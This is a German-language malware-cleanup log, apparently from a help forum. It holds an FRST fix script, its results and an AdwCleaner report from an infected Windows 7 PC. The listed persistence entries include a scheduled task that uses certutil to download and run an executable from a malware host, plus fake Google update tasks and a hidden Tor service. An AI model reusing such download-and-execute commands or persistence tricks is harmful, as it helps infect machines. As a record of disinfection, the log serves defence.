S2 pgt_svc; C:\Program Files (x86)\ProxyGate\MainService.exe [X] <==== ACHTUNG
C:\Program Files (x86)\ProxyGate
R2 TCPSvc; "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\tor.exe" --nt-service -f "C:\Users\Nico\AppData\Local\Temp\csrss\proxy\config" --Log "notice file C:\Users\Nico\AppData\Local\Temp\csrss\proxy\t" <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\csrss
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
C:\Windows\system32\mcicda64.dll
Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
C:\Program Files\Social Software
Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
C:\Program Files\SystemaRev
Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
C:\Program Files (x86)\nodejs
Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
C:\Program Files\Reimage
Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
C:\ProgramData\Iostream.exe
ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
AlternateDataStreams: C:\ProgramData:NT [40]
AlternateDataStreams: C:\ProgramData:NT2 [552]
AlternateDataStreams: C:\Users\All Users:NT [40]
AlternateDataStreams: C:\Users\All Users:NT2 [552]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
Unlock: C:\Windows\system32\Drivers\etc\hosts
C:\Windows\system32\Drivers\etc\hosts
Hosts:
VirusTotal: C:\Windows\system32\ntkrnlmp.exe
VirusTotal: C:\Windows\system32\osloader.exe
VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
Folder: C:\Windows\rss
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
RemoveProxy:
CMD: ipconfig /flushdns
CMD: netsh winsock reset
EmptyTemp:

*****************

Prozesse erfolgreich geschlossen.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\\resolve_run" => erfolgreich entfernt
C:\Program Files (x86)\Common Files\new.bat => erfolgreich verschoben
"HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\\Chrome Update Helper" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\03D22C9C66915D58C88912B64C1F984B8344EF09" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\0F684EC1163281085C6AF20528878103ACEFCAAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\1667908C9E22EFBD0590E088715CC74BE4C60884" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\18DEA4EFA93B06AE997D234411F3FD72A677EECE" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\2026D13756EB0DB753DF26CB3B7EEBE3E70BB2CF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\249BDA38A611CD746A132FA2AF995A2D3C941264" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\31AC96A6C17C425222C46D55C3CCA6BA12E54DAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\331E2046A1CCA7BFEF766724394BE6112B4CA3F7" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3353EA609334A9F23A701B9159E30CB6C22D4C59" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\373C33726722D3A5D1EDD1F1585D5D25B39BEA1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3850EDD77CC74EC9F4829AE406BBF9C21E0DA87F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\3D496FA682E65FC122351EC29B55AB94F3BB03FC" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4243A03DB4C3C15149CEA8B38EEA1DA4F26BD159" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\42727E052C0C2E1B35AB53E1005FD9EDC9DE8F01" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4420C99742DF11DD0795BC15B7B0ABF090DC84DF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\4C0AF5719009B7C9D85C5EAEDFA3B7F090FE5FFF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5240AB5B05D11B37900AC7712A3C6AE42F377C8C" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\5DD3D41810F28B2A13E9A004E6412061E28FA48D" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\7457A3793086DBB58B3858D6476889E3311E550E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\76A9295EF4343E12DFC5FE05DC57227C1AB00D29" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\775B373B33B9D15B58BC02B184704332B97C3CAF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\872CD334B7E7B3C3D1C6114CD6B221026D505EAB" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\88AD5DFE24126872B33175D1778687B642323ACF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9132E8B079D080E01D52631690BE18EBC2347C1E" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\982D98951CF3C0CA2A02814D474A976CBFF6BDB1" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9A08641F7C5F2CCA0888388BE3E5DBDDAAA3B361" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9C43F665E690AB4D486D4717B456C5554D4BCEB5" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\9E3F95577B37C74CA2F70C1E1859E798B7FC6B13" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A1F8DCB086E461E2ABB4B46ADCFA0B48C58B6E99" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A5341949ABE1407DD7BF7DFE75460D9608FBC309" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\A59CC32724DD07A6FC33F7806945481A2D13CA2F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AB7E760DA2485EA9EF5A6EEE7647748D4BA6B947" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD4C5429E10F4FF6C01840C20ABA344D7401209F" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\AD96BB64BA36379D2E354660780C2067B81DA2E0" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\B8EBF0E696AF77F51C96DB4D044586E2F4F8FD84" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\CDC37C22FE9272D8F2610206AD397A45040326B8" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\D3F78D747E7C5D6D3AE8ABFDDA7522BFB4CBD598" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB303C9B61282DE525DC754A535CA2D6A9BD3D87" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\DB77E5CFEC34459146748B667C97B185619251BA" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E22240E837B52E691C71DF248F12D27F96441C00" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\E513EAB8610CFFD7C87E00BCA15C23AAB407FCEF" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\ED841A61C0F76025598421BC1B00E24189E68D54" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\F83099622B4A9F72CB5081F742164AD1B8D048C9" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FBB42F089AF2D570F2BF6F493D107A3255A9BB1A" => erfolgreich entfernt
"HKLM\Software\Microsoft\SystemCertificates\Disallowed\Certificates\FFFA650F2CB2ABC0D80527B524DD3F9FC172C138" => erfolgreich entfernt
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\muV82mBJud.exe" => erfolgreich entfernt
C:\Program Files\Gemeinsame Dateien\5ZNAWZD2EL69 => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PLRFCKFE44692QO" => erfolgreich entfernt
"C:\Program Files\RDH9TH3UTU" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\2196509" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\okdd3kogot1" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\A4UX3F695ZAIC7C" => erfolgreich entfernt
"C:\Program Files (x86)\eu0vb4pykb5" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\flosdx" => erfolgreich entfernt
C:\Users\Nico\AppData\Local\pfialx.dll => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\KDY06ILDW1UEHVJ" => erfolgreich entfernt
"C:\Program Files\I88TDHYW3R" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\PatientSunset" => erfolgreich entfernt
C:\Windows\rss\csrss.exe => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\QIJFFKRURZ.exe" => erfolgreich entfernt
"C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22" => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => erfolgreich entfernt
C:\Users\Nico\AppData\Roaming\EpicNet Inc => erfolgreich verschoben
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{21cfe5ef-f3b0-11e7-bf9c-10c37b6f5940} => nicht gefunden
"HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\ShellExecuteHooks\\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
"HKLM\Software\Classes\CLSID\{BFD98515-CD74-48A4-98E2-13D209E3EE4F}" => erfolgreich entfernt
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
"HKLM\SOFTWARE\Policies\Google" => erfolgreich entfernt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => erfolgreich entfernt
HKLM\Software\Wow6432Node\Classes\CLSID\ielnksrch => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => erfolgreich entfernt
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => nicht gefunden
"HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch}" => erfolgreich entfernt
HKLM\Software\Classes\CLSID\{ielnksrch} => nicht gefunden
"HKLM\Software\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182} => erfolgreich verschoben
"C:\Windows\Installer\{F1DE73B6-EC12-467B-9EA0-FEBA88CC9182}\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}.xpi" => nicht gefunden
"HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{2DE791A8-8C99-44DF-9976-CEACCA8FE024}" => erfolgreich entfernt
C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\backlh" => erfolgreich entfernt
backlh => Dienst erfolgreich entfernt
C:\ProgramData\Logic Cramble => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\MicroService" => erfolgreich entfernt
MicroService => Dienst erfolgreich entfernt
C:\Users\Nico\AppData\Local\XService => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\SystemUpdate64" => erfolgreich entfernt
SystemUpdate64 => Dienst erfolgreich entfernt
C:\Program Files\SystemaRev => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\winamgr" => erfolgreich entfernt
winamgr => Dienst erfolgreich entfernt
WinDefender => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\WinDefender" => erfolgreich entfernt
WinDefender => Dienst erfolgreich entfernt
"C:\Windows\windefender.exe" => wurde entsperrt
Konnte nicht verschoben werden "C:\Windows\windefender.exe" => ist geplant bei Neustart verschoben zu werden.
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich gestoppt.
"HKLM\System\CurrentControlSet\Services\848d0b10145f615d9a5315f9c7921103" => erfolgreich entfernt
848d0b10145f615d9a5315f9c7921103 => Dienst erfolgreich entfernt
C:\Windows\qcusolizqbhuglpw.qcus => erfolgreich verschoben
"HKLM\System\CurrentControlSet\Services\aspnet_state" => erfolgreich entfernt
aspnet_state => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\EasyAntiCheat" => erfolgreich entfernt
EasyAntiCheat => Dienst erfolgreich entfernt
"HKLM\System\CurrentControlSet\Services\Nettrans" => erfolgreich entfernt
Nettrans => Dienst erfolgreich entfernt
"C:\ProgramData\PrefsSecure" => nicht gefunden
"HKLM\System\CurrentControlSet\Services\pgt_svc" => erfolgreich entfernt
pgt_svc => Dienst erfolgreich entfernt
"C:\Program Files (x86)\ProxyGate" => nicht gefunden
TCPSvc => Dienst konnte nicht gestoppt werden.
"HKLM\System\CurrentControlSet\Services\TCPSvc" => erfolgreich entfernt

Ergebnis der geplanten Datei-Verschiebungen (Start-Modus: Normal) (Datum&Uhrzeit: 31-05-2018 16:12:06)

==> ACHTUNG: Das System wurde nicht neu gestartet.
C:\Windows\windefender.exe => ist erfolgreich verschoben

==== Ende vom Fixlog 16:12:07 ====
AdwCleaner
Code:
# -------------------------------
# Malwarebytes AdwCleaner 7.1.1.0
# -------------------------------
# Build:    04-27-2018
# Database: 2018-05-30.1
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    05-31-2018
# Duration: 00:00:02
# OS:      Windows 7 Ultimate
# Cleaned:  83
# Failed:  0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted      C:\Users\Nico\AppData\Local\betterworld
Deleted      C:\Users\Nico\AppData\Roaming\FastDataX
Deleted      C:\Users\Nico\AppData\Roaming\FLV and Media Player
